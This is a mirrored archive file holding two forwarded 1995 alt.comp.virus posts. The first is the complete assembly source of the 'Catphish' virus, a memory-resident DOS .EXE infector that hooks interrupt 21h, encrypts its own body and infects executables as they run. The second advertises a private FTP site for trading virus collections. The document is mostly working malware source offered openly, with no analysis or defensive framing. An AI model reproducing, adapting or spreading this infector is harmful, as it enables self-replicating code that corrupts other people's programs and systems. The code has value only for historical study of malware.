mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
553 lines
13 KiB
NASM
553 lines
13 KiB
NASM
From smtp Sun Jan 29 16:25 EST 1995
|
||
Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST
|
||
Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST)
|
||
From: ids.net!JOSHUAW (JOSHUAW)
|
||
To: pobox.jwu.edu!joshuaw
|
||
Content-Length: 11874
|
||
Content-Type: text
|
||
Message-Id: <950129161852.10074@ids.net>
|
||
Status: RO
|
||
|
||
To: joshuaw@pobox.jwu.edu
|
||
Subject: (fwd) CATPHISH.ASM
|
||
Newsgroups: alt.comp.virus
|
||
|
||
Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail
|
||
From: jdmathew@mtu.edu (Icepick)
|
||
Newsgroups: alt.comp.virus
|
||
Subject: CATPHISH.ASM
|
||
Date: 26 Jan 1995 13:06:15 -0500
|
||
Organization: Michigan Technological University
|
||
Lines: 486
|
||
Message-ID: <3g8oan$54g@maxwell11.ee>
|
||
NNTP-Posting-Host: maxwell11.ee.mtu.edu
|
||
X-Newsreader: TIN [version 1.2 PL1]
|
||
|
||
|
||
|
||
name VIRUSTEST
|
||
title
|
||
code segment
|
||
assume cs:code, ds:code, es:code
|
||
org 100h
|
||
|
||
;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||
; The Catphish Virus.
|
||
;
|
||
; The Catphish virus is a resident .EXE infector.
|
||
; Size: 678 bytes (decimal).
|
||
; No activation (bomb).
|
||
; Saves date and file attributes.
|
||
;
|
||
; If assembling, check_if_resident jump must be marked over
|
||
; with nop after first execution (first execution will hang
|
||
; system).
|
||
;
|
||
; *** Source is made available to learn from, not to
|
||
; change author's name and claim credit! ***
|
||
|
||
start:
|
||
call setup ; Find "delta offset".
|
||
setup:
|
||
pop bp
|
||
sub bp, offset setup-100h
|
||
jmp check_if_resident ; See note above about jmp!
|
||
|
||
pre_dec_em:
|
||
mov bx,offset infect_header-100h
|
||
add bx,bp
|
||
mov cx,endcrypt-infect_header
|
||
|
||
ror_em:
|
||
mov dl,byte ptr cs:[bx]
|
||
ror dl,1 ; Decrypt virus code
|
||
mov byte ptr cs:[bx],dl ; by rotating right.
|
||
inc bx
|
||
loop ror_em
|
||
|
||
jmp check_if_resident
|
||
|
||
;--------------------------------- Infect .EXE header -----------------------
|
||
; The .EXE header modifying code below is my reworked version of
|
||
; Dark Angel's code found in his Phalcon/Skism virus guides.
|
||
|
||
|
||
infect_header:
|
||
push bx
|
||
push dx
|
||
push ax
|
||
|
||
|
||
|
||
mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs
|
||
; ^---make sure you don't destroy the file handle
|
||
mov cl, 4 ; Multiply by 16. Won't
|
||
shl bx, cl ; work with headers > 4096
|
||
; bytes. Oh well!
|
||
sub ax, bx ; Subtract header size from
|
||
sbb dx, 0 ; file size
|
||
; Now DX:AX is loaded with file size minus header size
|
||
mov cx, 10h ; DX:AX/CX = AX Remainder DX
|
||
div cx
|
||
|
||
|
||
mov word ptr [buffer+14h-100h], dx ; IP Offset
|
||
mov word ptr [buffer+16h-100h], ax ; CS Displacement in module
|
||
|
||
|
||
mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS
|
||
mov word ptr [buffer+10h-100h], 0A000h ; Starting SP
|
||
|
||
pop ax
|
||
pop dx
|
||
|
||
add ax, endcode-start ; add virus size
|
||
cmp ax, endcode-start
|
||
jb fix_fault
|
||
jmp execont
|
||
|
||
|
||
war_cry db 'Cry Havoc, and let slip the Dogs of War!',0
|
||
v_name db '[Catphish]',0 ; Virus name.
|
||
v_author db 'FirstStrike',0 ; Me.
|
||
v_stuff db 'Kraft!',0
|
||
|
||
|
||
fix_fault:
|
||
add dx,1d
|
||
|
||
execont:
|
||
push ax
|
||
mov cl, 9
|
||
shr ax, cl
|
||
ror dx, cl
|
||
stc
|
||
|
||
adc dx, ax
|
||
pop ax
|
||
and ah, 1
|
||
|
||
|
||
mov word ptr [buffer+4-100h], dx ; Fix-up the file size in
|
||
mov word ptr [buffer+2-100h], ax ; the EXE header.
|
||
|
||
pop bx
|
||
retn ; Leave subroutine
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
|
||
check_if_resident:
|
||
push es
|
||
xor ax,ax
|
||
mov es,ax
|
||
|
||
cmp word ptr es:[63h*4],0040h ; Check to see if virus
|
||
jnz grab_da_vectors ; is already resident
|
||
jmp exit_normal ; by looking for a 40h
|
||
; signature in the int 63h
|
||
; offset section of
|
||
; interrupt table.
|
||
|
||
grab_da_vectors:
|
||
|
||
mov ax,3521h ; Store original int 21h
|
||
int 21h ; vector pointer.
|
||
mov word ptr cs:[bp+dos_vector-100h],bx
|
||
mov word ptr cs:[bp+dos_vector+2-100h],es
|
||
|
||
|
||
|
||
load_high:
|
||
push ds
|
||
|
||
find_chain: ; Load high routine that
|
||
; uses the DOS internal
|
||
mov ah,52h ; table function to find
|
||
int 21h ; start of MCB and then
|
||
; scales up chain to
|
||
mov ds,es: word ptr [bx-2] ; find top. (The code
|
||
assume ds:nothing ; is long, but it is the
|
||
; only code that would
|
||
xor si,si ; work when an infected
|
||
; .EXE was to be loaded
|
||
Middle_check: ; into memory.
|
||
|
||
cmp byte ptr ds:[0],'M'
|
||
jne Check4last
|
||
|
||
add_one:
|
||
mov ax,ds
|
||
add ax,ds:[3]
|
||
inc ax
|
||
|
||
mov ds,ax
|
||
jmp Middle_check
|
||
|
||
Check4last:
|
||
cmp byte ptr ds:[0],'Z'
|
||
jne Error
|
||
mov byte ptr ds:[0],'M'
|
||
sub word ptr ds:[3],(endcode-start+15h)/16h+1
|
||
jmp add_one
|
||
|
||
error:
|
||
mov byte ptr ds:[0],'Z'
|
||
mov word ptr ds:[1],008h
|
||
mov word ptr ds:[3],(endcode-start+15h)/16h+1
|
||
|
||
push ds
|
||
pop ax
|
||
inc ax
|
||
push ax
|
||
pop es
|
||
|
||
|
||
|
||
|
||
|
||
move_virus_loop:
|
||
mov bx,offset start-100h ; Move virus into carved
|
||
add bx,bp ; out location in memory.
|
||
mov cx,endcode-start
|
||
push bp
|
||
mov bp,0000h
|
||
|
||
move_it:
|
||
mov dl, byte ptr cs:[bx]
|
||
mov byte ptr es:[bp],dl
|
||
inc bp
|
||
inc bx
|
||
loop move_it
|
||
pop bp
|
||
|
||
|
||
|
||
hook_vectors:
|
||
|
||
mov ax,2563h ; Hook the int 21h vector
|
||
mov dx,0040h ; which means it will
|
||
int 21h ; point to virus code in
|
||
; memory.
|
||
mov ax,2521h
|
||
mov dx,offset virus_attack-100h
|
||
push es
|
||
pop ds
|
||
int 21h
|
||
|
||
|
||
|
||
|
||
pop ds
|
||
|
||
|
||
|
||
exit_normal: ; Return control to
|
||
pop es ; infected .EXE
|
||
mov ax, es ; (Dark Angle code.)
|
||
add ax, 10h
|
||
add word ptr cs:[bp+OrigCSIP+2-100h], ax
|
||
|
||
cli
|
||
add ax, word ptr cs:[bp+OrigSSSP+2-100h]
|
||
mov ss, ax
|
||
mov sp, word ptr cs:[bp+OrigSSSP-100h]
|
||
sti
|
||
|
||
xor ax,ax
|
||
xor bp,bp
|
||
|
||
endcrypt label byte
|
||
|
||
db 0eah
|
||
OrigCSIP dd 0fff00000h
|
||
OrigSSSP dd ?
|
||
|
||
exe_attrib dw ?
|
||
date_stamp dw ?
|
||
time_stamp dw ?
|
||
|
||
|
||
|
||
dos_vector dd ?
|
||
|
||
buffer db 18h dup(?) ; .EXE header buffer.
|
||
|
||
|
||
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
|
||
virus_attack proc far
|
||
assume cs:code,ds:nothing, es:nothing
|
||
|
||
|
||
cmp ax,4b00h ; Infect only on file
|
||
jz run_kill ; executions.
|
||
|
||
leave_virus:
|
||
jmp dword ptr cs:[dos_vector-100h]
|
||
|
||
|
||
|
||
run_kill:
|
||
call infectexe
|
||
jmp leave_virus
|
||
|
||
|
||
|
||
|
||
|
||
infectexe: ; Same old working horse
|
||
push ax ; routine that infects
|
||
push bx ; the selected file.
|
||
push cx
|
||
push es
|
||
push dx
|
||
push ds
|
||
|
||
|
||
|
||
mov cx,64d
|
||
mov bx,dx
|
||
|
||
findname:
|
||
cmp byte ptr ds:[bx],'.'
|
||
jz o_k
|
||
inc bx
|
||
loop findname
|
||
|
||
pre_get_out:
|
||
jmp get_out
|
||
|
||
o_k:
|
||
cmp byte ptr ds:[bx+1],'E' ; Searches for victims.
|
||
jnz pre_get_out
|
||
cmp byte ptr ds:[bx+2],'X'
|
||
jnz pre_get_out
|
||
cmp byte ptr ds:[bx+3],'E'
|
||
jnz pre_get_out
|
||
|
||
|
||
|
||
|
||
getexe:
|
||
mov ax,4300h
|
||
call dosit
|
||
|
||
mov word ptr cs:[exe_attrib-100h],cx
|
||
|
||
mov ax,4301h
|
||
xor cx,cx
|
||
call dosit
|
||
|
||
exe_kill:
|
||
mov ax,3d02h
|
||
call dosit
|
||
xchg bx,ax
|
||
|
||
mov ax,5700h
|
||
call dosit
|
||
|
||
mov word ptr cs:[time_stamp-100h],cx
|
||
mov word ptr cs:[date_stamp-100h],dx
|
||
|
||
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
mov ah,3fh
|
||
mov cx,18h
|
||
mov dx,offset buffer-100h
|
||
call dosit
|
||
|
||
cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker
|
||
jnz infectforsure ; of 1993h in .EXE
|
||
jmp close_it ; header checksum
|
||
; position.
|
||
infectforsure:
|
||
call move_f_ptrfar
|
||
|
||
push ax
|
||
push dx
|
||
|
||
|
||
call store_header
|
||
|
||
pop dx
|
||
pop ax
|
||
|
||
call infect_header
|
||
|
||
|
||
push bx
|
||
push cx
|
||
push dx
|
||
|
||
|
||
mov bx,offset infect_header-100h
|
||
mov cx,(endcrypt)-(infect_header)
|
||
|
||
rol_em: ; Encryption via
|
||
mov dl,byte ptr cs:[bx] ; rotating left.
|
||
rol dl,1
|
||
mov byte ptr cs:[bx],dl
|
||
inc bx
|
||
loop rol_em
|
||
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
|
||
mov ah,40h
|
||
mov cx,endcode-start
|
||
mov dx,offset start-100h
|
||
call dosit
|
||
|
||
|
||
mov word ptr cs:[buffer+12h-100h],1993h
|
||
|
||
|
||
call move_f_ptrclose
|
||
|
||
mov ah,40h
|
||
mov cx,18h
|
||
mov dx,offset buffer-100h
|
||
call dosit
|
||
|
||
mov ax,5701h
|
||
mov cx,word ptr cs:[time_stamp-100h]
|
||
mov dx,word ptr cs:[date_stamp-100h]
|
||
call dosit
|
||
|
||
close_it:
|
||
|
||
|
||
mov ah,3eh
|
||
call dosit
|
||
|
||
get_out:
|
||
|
||
|
||
pop ds
|
||
pop dx
|
||
|
||
set_attrib:
|
||
mov ax,4301h
|
||
mov cx,word ptr cs:[exe_attrib-100h]
|
||
call dosit
|
||
|
||
|
||
pop es
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
|
||
retn
|
||
|
||
;---------------------------------- Call to DOS int 21h ---------------------
|
||
|
||
dosit: ; DOS function call code.
|
||
pushf
|
||
call dword ptr cs:[dos_vector-100h]
|
||
retn
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
;-------------------------------- Store Header -----------------------------
|
||
|
||
store_header:
|
||
les ax, dword ptr [buffer+14h-100h] ; Save old entry point
|
||
mov word ptr [OrigCSIP-100h], ax
|
||
mov word ptr [OrigCSIP+2-100h], es
|
||
|
||
les ax, dword ptr [buffer+0Eh-100h] ; Save old stack
|
||
mov word ptr [OrigSSSP-100h], es
|
||
mov word ptr [OrigSSSP+2-100h], ax
|
||
|
||
retn
|
||
|
||
;---------------------------------------------------------------------------
|
||
|
||
|
||
|
||
|
||
|
||
|
||
;---------------------------------- Set file pointer ------------------------
|
||
|
||
move_f_ptrfar: ; Code to move file pointer.
|
||
mov ax,4202h
|
||
jmp short move_f
|
||
|
||
move_f_ptrclose:
|
||
mov ax,4200h
|
||
|
||
move_f:
|
||
xor dx,dx
|
||
xor cx,cx
|
||
call dosit
|
||
retn
|
||
|
||
;----------------------------------------------------------------------------
|
||
|
||
|
||
endcode label byte
|
||
|
||
endp
|
||
|
||
code ends
|
||
end start
|
||
|
||
From smtp Fri Jan 27 13:23 EST 1995
|
||
Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST
|
||
Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST)
|
||
From: ids.net!JOSHUAW (JOSHUAW)
|
||
To: pobox.jwu.edu!joshuaw
|
||
Content-Length: 1179
|
||
Content-Type: binary
|
||
Message-Id: <950127132138.b52b@ids.net>
|
||
Status: RO
|
||
|
||
To: joshuaw@pobox.jwu.edu
|
||
Subject: (fwd) Private Virii FTP Site
|
||
Newsgroups: alt.comp.virus
|
||
|
||
Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail
|
||
From: yojimbo@crl.com (Douglas Mauldin)
|
||
Newsgroups: alt.comp.virus
|
||
Subject: Private Virii FTP Site
|
||
Date: 24 Jan 1995 22:01:53 -0800
|
||
Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest]
|
||
Lines: 14
|
||
Message-ID: <3g4pgh$ka2@crl12.crl.com>
|
||
NNTP-Posting-Host: crl12.crl.com
|
||
X-Newsreader: TIN [version 1.2 PL2]
|
||
|
||
I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm
|
||
always on the lookout for new viral material. If you'd like access, or
|
||
like to trade, email me a list of your collection.
|
||
|
||
Serious inquiries only.
|
||
|
||
<EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>- - <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-- <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>- <EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
<EFBFBD> Yojimbo [<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>] <EFBFBD> Fast as the Wind <EFBFBD>
|
||
<EFBFBD> SysOp: The Dojo BBS <EFBFBD> Quiet as the Forest <EFBFBD>
|
||
<EFBFBD> 1.7i3.436.1795 <EFBFBD> Aggressive as Fire <EFBFBD>
|
||
<EFBFBD> QUaRaNTiNE HomeSite <EFBFBD> And <EFBFBD>
|
||
<EFBFBD> THe ULTiMaTE ViRaL InFeCTiON <EFBFBD> Immovable as a Mountain <EFBFBD>
|
||
<EFBFBD><EFBFBD> -<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
|